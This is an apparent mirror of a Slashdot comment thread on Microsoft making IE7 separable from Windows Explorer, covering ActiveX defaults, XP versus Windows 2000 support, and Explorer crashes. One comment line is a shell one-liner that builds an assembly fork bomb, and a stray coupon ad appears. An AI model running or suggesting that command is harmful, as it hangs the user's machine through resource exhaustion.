Slashdot Mirror
IE7 Separated from Windows Explorer
An anonymous reader writes "Security experts warned Microsoft 10 years ago that putting IE as a component of Windows Explorer was a bad idea, looks like Microsoft finally decided to listen to the advice. According to a short write up in Business Week, Microsoft has decided that when IE7 comes out with Vista it will no longer be a component of Windows Explorer and will be able to replace IE6 even on XP machines."
That did not apply to windows xp but to windows 95 and me.
Maybe it could be done but this is the reason it will only be done for xp. On the other hand, having seen some of microsofts products it doesnt suprise me that a web browser which executes remote code (activex) is part of the os.
200GB/2TB $7.95 Coupon: SAVE90DOLLAR
Technically they were correct. Think of it as if BMW rerouted the ignition circiut to make sure it passed through the car stereo. Technically, removing the stereo could render the car useless. Its a stupid design decision unless you're trying to monopolize the market in car stereos.
Windows 2000 is no longer in the windows labelled "mainstream support" so the less they have to deal with it the better for their support teams. On IEBlog, they also cite specifically why it can work for WinXP and not Win2K. It's because of the security upgrades done to XP in service pack 2 which they claim are not easily back-ported into 2K.
http://www.microsoft.com/windows/ie/ie7/featureta
From here
http://forum.pcstats.com/showthread.php?t=35534
He he, "one quirky feature". Way to miss the point. Note that you can disable Download Signed ActiveX controls too, or make at least make it prompt you.
There's a best practices document here
http://msdn.microsoft.com/library/default.asp?url
I think the basic problem is that they still want to avoid breaking websites that rely on ActiveX as much as possible. You can see lots of stuff in that document which means that some ActiveX controls will still automatically on a webpage. If anyone develops and exploit for them and you run it on XP as an admin, you have a problem. Of course, if the user knows what they are doing they can make it secure, but the default setting is more geared to compatibility than security.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
The problem with MS's version was that the whole freaking system crashed if IE crashed.
This isn't entirely correct. EXPLORER.EXE, which is tied in with IE and is largely responsible for the GUI, can be crashed by IE. This mucks up the GUI to the point where the system is apparently hung. However, the NTOSKRNL.EXE almost never gets faulted by these kinds of crashes and, in reality, continues to run even though the interface is completely hosed. This is analogous to crashing XWindows in Unix in the sense that X can be completely hung but system processes underneath it continue to function normally. The difference is that a Ctrl-Alt-Bksp will kill X and give you a command prompt, whereas Windows has no such option. There has been talk in the past of Microsoft releasing a command-line version of Windows Server (i.e. the GUI is optional), but AFAIK, that's just been talk with no real action.
Note that crashes that do fully lock up a Windows box are almost always caused by faulty drivers, usually video drivers because these run in kernel space. Linux is just as susceptible to faulty drivers as Windows is. I've had a number of servers up and croak with a KERNEL PANIC because of a faulty RAID driver. Dodgy hardware, poor cooling, overclocking, etc. also locks up boxes but this isn't a Windows-only phenomenon by any means.
In the end they will lay their freedom at our feet and say to us, Make us your slaves, but feed us. - Fyodor Dostoyevsky